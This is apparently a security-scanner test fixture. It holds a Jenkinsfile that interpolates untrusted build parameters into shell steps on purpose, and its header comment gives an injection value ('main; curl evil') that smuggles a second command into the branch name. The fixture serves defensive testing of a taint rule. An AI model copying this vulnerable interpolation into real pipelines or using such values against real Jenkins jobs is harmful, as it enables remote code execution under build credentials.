// Real-world fixture — derived from:
//   roryeckel/codex-jenkinsfile — Jenkinsfile
//   https://github.com/roryeckel/codex-jenkinsfile
//
// Purpose: exercises TAINT-JK-001 — attacker-controlled params
// interpolated into a double-quoted Groovy ``sh "..."`` step.  The
// real Jenkinsfile accepts a ``GIT_BRANCH`` build parameter and
// interpolates it directly into git commands.  Anyone with Build
// permission can trigger the job with GIT_BRANCH=``main; curl evil``
// and get RCE under the build agent's credentials.
pipeline {
    agent any
    parameters {
        string(name: 'GIT_BRANCH', defaultValue: 'main', description: 'Branch to work on')
        string(name: 'GIT_USER_NAME', defaultValue: 'Codex Bot', description: 'Commit author name')
        string(name: 'PROMPT', defaultValue: 'Improve code', description: 'Codex prompt')
    }
    stages {
        stage('Checkout') {
            steps {
                sh "git fetch origin ${params.GIT_BRANCH}"                       // <- TAINT-JK-001
                sh "git checkout -f ${params.GIT_BRANCH}"                        // <- TAINT-JK-001
                sh "git reset --hard origin/${params.GIT_BRANCH}"                // <- TAINT-JK-001
            }
        }
        stage('Author') {
            steps {
                sh "git config user.name '${params.GIT_USER_NAME}' || true"       // <- TAINT-JK-001
            }
        }
        stage('Commit') {
            steps {
                sh "git commit -m 'Changes by Codex\\n\\nPrompt: ${params.PROMPT}'" // <- TAINT-JK-001
            }
        }
    }
}
